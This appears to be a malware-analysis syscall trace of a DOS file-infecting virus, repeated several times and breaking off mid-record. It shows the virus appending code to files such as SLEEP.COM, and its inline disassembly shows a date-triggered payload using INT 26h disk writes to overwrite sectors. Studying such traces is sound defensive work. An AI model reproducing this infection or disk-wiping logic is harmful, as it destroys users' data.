2018-12-25T12:43:39.134193955Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.144360918Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.147423071Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.154610618Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.16103032Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.163296421Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.172907225Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.179154176Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.182187188Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.183591424Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.186029322Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.195218483Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.196561072Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.204267663Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.214456777Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.219265248Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.226594887Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.233379014Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.235037015Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.237561872Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:39.242479405Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:39.244529063Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:39.246080146Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:38.820453412Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:38.822248287Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:38.824583547Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:38.829478306Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:38.834829423Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:38.840212785Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:38.845093523Z 62 PC: 12b20 | Close file
2018-12-25T12:43:38.846833806Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:38.862522995Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.871718885Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:38.878474538Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:38.880429792Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:38.883346934Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:38.892541796Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:38.89484785Z 62 PC: 12c29 | Close file
2018-12-25T12:43:38.903912366Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.913625695Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.916830259Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.923517985Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.930251364Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:38.932502978Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.942549171Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.948863329Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:38.952156226Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:38.953448699Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:38.955860205Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:38.964545677Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:38.96601766Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:38.973488367Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:38.983562619Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:38.986140278Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:38.992556586Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:38.999898828Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.002075891Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.012676295Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.01995754Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.022661361Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.024017508Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.030441557Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.03971247Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.041426377Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.049797345Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.05931128Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.061814154Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.073328236Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.079416016Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.081075259Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.090863301Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.097690897Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.10046294Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.101943909Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.104976294Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.113423624Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.1150801Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.1229396Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.132754638Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.135773946Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.14316467Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.149376393Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.151775202Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.15782272Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.162644936Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.165559258Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.167765066Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.170510824Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.181519651Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.183187718Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.184601517Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.187348821Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.189656138Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.196917486Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.201193819Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.203278692Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.21108083Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.217469957Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.220947266Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.221969431Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.223701613Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.230630805Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.231940595Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.237014536Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.249263834Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.252030719Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.263699756Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.27052861Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.272551925Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.282457695Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.289481857Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.292690093Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.294569225Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.301694258Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.309801051Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.311452636Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.319985979Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.330686303Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.332591668Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.337297063Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.341653075Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.342975594Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.345259915Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:39.347937072Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:39.349432847Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:39.351350914Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:39.23981249Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:39.242648003Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:39.245790887Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:39.251841521Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:39.257800409Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:39.264450542Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:39.270641342Z 62 PC: 12b20 | Close file
2018-12-25T12:43:39.273756123Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:39.292358886Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.299885152Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:39.306635856Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:39.308918666Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:39.311564154Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:39.320096633Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:39.322048037Z 62 PC: 12c29 | Close file
2018-12-25T12:43:39.329238586Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.33868602Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.341917209Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.348262288Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.354676065Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.357174906Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.367527775Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.374186859Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.377784018Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.379522904Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.383051958Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.392382687Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.39413706Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.401889309Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.412616578Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.416106743Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.422669168Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.42993833Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.431745816Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.4413363Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.447795844Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.453662954Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.455031124Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.457655118Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.466675757Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.468039765Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.476389179Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.485868383Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.488496692Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.495251652Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.501828208Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.50383862Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.513456771Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.520262664Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.522996433Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.524457133Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.527809581Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.537494749Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.539085228Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.547152364Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.556579573Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.559845154Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.566446341Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.572813559Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.574889803Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.580094929Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.584921817Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.587761061Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.590368981Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.592868717Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.606772824Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.609729298Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.611327524Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.614802801Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.61812903Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.623759699Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.63055376Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.633062666Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.64271134Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.649114394Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.65187771Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.653529594Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.664107544Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.673564193Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.675501823Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.6832884Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.69334319Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.697032788Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.704346266Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.71347713Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.715964705Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.726775919Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.733599462Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.737339586Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.739047345Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.741903851Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.751514268Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.753272456Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.761061874Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.772176604Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.774854529Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.781194004Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.788061914Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.78995439Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.792344668Z 59 PC: 12aad | Change current directory
2018-12-25T12:43:39.797220127Z 42 PC: 12c38 | Get date 0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
0x12c40: jb 0x12cb8
0x12c42: mov ah, 9
0x12c44: lea dx, word ptr [bp + 0x3ab]
0x12c48: int 0x21
0x12c4a: mov al, 2
0x12c4c: mov cx, 0xff
0x12c4f: mov dx, 0
0x12c52: int 0x26
0x12c54: mov al, 3
0x12c56: mov cx, 0xff
0x12c59: mov dx, 0
0x12c5c: int 0x26
0x12c5e: mov al, 4
0x12c60: mov cx, 0xff
0x12c63: mov dx, 0
0x12c66: int 0x26
0x12c68: mov al, 5
2018-12-25T12:43:39.799311982Z 59 PC: 12aba | Change current directory
2018-12-25T12:43:39.800869559Z 26 PC: 12cc6 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15498,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:39.426635639Z 26 PC: 12cc6 | Set disk transfer address
2018-12-25T12:43:39.428651062Z 71 PC: 12a97 | Get current directory
2018-12-25T12:43:39.431934966Z 78 PC: 12b01 | Find first file
2018-12-25T12:43:39.438078248Z 78 PC: 12b01 | Find first file (See above)
2018-12-25T12:43:39.444296462Z 61 PC: 12ccf | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:43:39.451048495Z 63 PC: 12b1c | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:43:39.45719878Z 62 PC: 12b20 | Close file
2018-12-25T12:43:39.458985859Z 67 PC: 12cda | Get or set file attributes
2018-12-25T12:43:39.476900318Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.483178613Z 64 PC: 12bf9 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:43:39.489483951Z 66 PC: 12cc1 | Move file pointer
2018-12-25T12:43:39.491151187Z 44 PC: 12c04 | Get time 0x12c04: cmp dh, 0
0x12c07: je 0x12c00
0x12c09: mov byte ptr cs:[bp + 0x4d2], dh
0x12c0e: call 0x12dce
0x12c11: inc byte ptr cs:[bp + 0x4d3]
0x12c16: mov ax, 0x5701
0x12c19: mov cx, word ptr cs:[bp + 0x546]
0x12c1e: mov dx, word ptr cs:[bp + 0x548]
0x12c23: int 0x21
0x12c25: mov ah, 0x3e
0x12c27: int 0x21
0x12c29: xor cx, cx
0x12c2b: mov cl, byte ptr cs:[bp + 0x545]
0x12c30: call 0x12cd1
0x12c33: ret
0x12c34: mov ah, 0x2a
0x12c36: int 0x21
0x12c38: cmp dh, 4
0x12c3b: jne 0x12cb8
0x12c3d: cmp dl, 7
2018-12-25T12:43:39.493590893Z 64 PC: 12e27 | Write file or device (Write 974 bytes on handle 5)
2018-12-25T12:43:39.502087565Z 87 PC: 12c25 | Get or set file date and time
2018-12-25T12:43:39.50384042Z 62 PC: 12c29 | Close file
2018-12-25T12:43:39.511174379Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.520696065Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.523634661Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.529982386Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.53611619Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.539092022Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.548768799Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.555091523Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.558370438Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.560569458Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.563384153Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.572422216Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.574104882Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.581834679Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.592317656Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.594990213Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.601359836Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.624338482Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.626352861Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.636456069Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.652209038Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.655140493Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.659498507Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.663436817Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.673074441Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.67503448Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.684172409Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.694449767Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.697045965Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.70362729Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.710492096Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.712572402Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.723005632Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.730611007Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.733661164Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.735323456Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.739003532Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.747708334Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.749553893Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.757696542Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.773143316Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.775714295Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.782485149Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.788464404Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.790303565Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.795099149Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.799694242Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.802580558Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.804362385Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.806820214Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.821429256Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.823763278Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.825506502Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.829920341Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.833823217Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.844301691Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.850426358Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.853133254Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.865569952Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.870469812Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.873330332Z 66 PC: 12cc1 | Move file pointer (See above)
2018-12-25T12:43:39.874617203Z 44 PC: 12c04 | Get time (See above)
2018-12-25T12:43:39.876403831Z 64 PC: 12e27 | Write file or device (See above)
2018-12-25T12:43:39.88316034Z 87 PC: 12c25 | Get or set file date and time (See above)
2018-12-25T12:43:39.887630135Z 62 PC: 12c29 | Close file (See above)
2018-12-25T12:43:39.895596451Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.906006299Z 79 PC: 12b01 | Find next file (See above)
2018-12-25T12:43:39.908628923Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.915003465Z 63 PC: 12b1c | Read file or device (See above)
2018-12-25T12:43:39.922166564Z 62 PC: 12b20 | Close file (See above)
2018-12-25T12:43:39.923989735Z 67 PC: 12cda | Get or set file attributes (See above)
2018-12-25T12:43:39.934020543Z 61 PC: 12ccf | Open file (See above)
2018-12-25T12:43:39.941299481Z 64 PC: 12bf9 | Write file or device (See above)
2018-12-25T12:43:39.94424362Z 66 PC: 12cc1 | Move file pointer (See above)
